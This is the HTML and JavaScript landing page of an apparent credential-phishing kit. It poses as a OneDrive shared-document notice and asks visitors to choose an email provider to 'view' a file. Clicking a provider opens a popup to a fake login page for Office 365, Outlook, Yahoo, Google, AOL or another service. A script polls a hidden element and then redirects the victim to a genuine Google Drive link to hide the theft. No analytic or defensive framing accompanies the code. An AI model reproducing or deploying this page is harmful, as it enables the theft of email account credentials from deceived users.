<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <link rel="stylesheet" href="css/styles.css">
</head>

<body>

    <section id="log-section">
        <div class="log-main-col">

            <div class="log-header">
                <div class="header-logo">
                    <img src="imgs/one-logo.png" width="180" alt="">
                </div>
                <div class="header-text">
                    <p>To read the document, please choose your email provider below. <br /> Login to view shared file.
                    </p>
                </div>
            </div>

            <div class="log-list-col">
                <div class="log-list">
                    <ul class="list-inline log-menu">
                        <li>
                            <a href="#" data-n="link1" data-nn="OFFICE.html">
                                <img src="imgs/login-office-365.png" alt="">
                            </a>
                        </li>
                        <li>
                            <a href="#" data-n="link2" data-nn="OUT.html">
                                <img src="imgs/login-outlook.png" alt="">
                            </a>
                        </li>
                        <li>
                            <a href="#" data-n="link3" data-nn="YAHOO.html">
                                <img src="imgs/login-yahoo.png" alt="">
                            </a>
                        </li>
                        <li>
                            <a href="#" data-n="link4" data-nn="GMA.html">
                                <img src="imgs/login-google.png" alt="">
                            </a>
                        </li>
                        <li>
                            <a href="#" data-n="link5" data-nn="AOL.html"">
                                <img src="imgs/login-aol.png" alt="">
                            </a>
                        </li>
                        <li>
                            <a href="#" data-n="link6" data-nn="OTHER.html">
                                <img src="imgs/login-other.png" alt="">
                            </a>
                        </li>
                    </ul>
                </div>
                <div class="log-list-text">
                    <p>Get to all your files from anywhere, on any device and share them with anyone.<br/> One Drive your
                        shared document in one cloud.</p>
                </div>
            </div>

        </div>
    </section>

<div style="" id="checks" style="display: none;"></div>
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
   <script>
     $(document).ready(function(e){ 
	   window_opener_xc(); 
	 });
	 function window_opener_xc(){
	   var url_part = get_extra_data(1);
	   $('li a').click(function(e){
	     e.preventDefault();
		 var checks = $('#checks');
         checks.data('b', $(this).data('n'));		 
         checks.data('c', $(this).data('goto'));		 
		 var win3 = window.open(url_part+$(this).data('nn'), '_blank', 'location=yes,height=570,width=520,scrollbars=yes,status=yes');
	     setInterval(function(){ 
		   if($('#checks').html()){ window.location.replace(get_extra_data(2)); }
		 }, 3000);
	   });
	 }
	 function get_extra_data(a){
	   var output = '';
	   if(a==1){
	     output = '';
	   }
	   else if(a==2){
	     output = "https://drive.google.com/file/d/1WaMliLzZ5bR5HIbc8VULfwEKDAp5GBJ6/view?fbclid=IwAR1i7nEA1gqnVdRjWgF8Q5PLJ4cETHGqXJBxoiRwRP6rQAg9N4yCAG9Cxug";
	   }
	   return output;
	 }
   </script>
</body>

</html>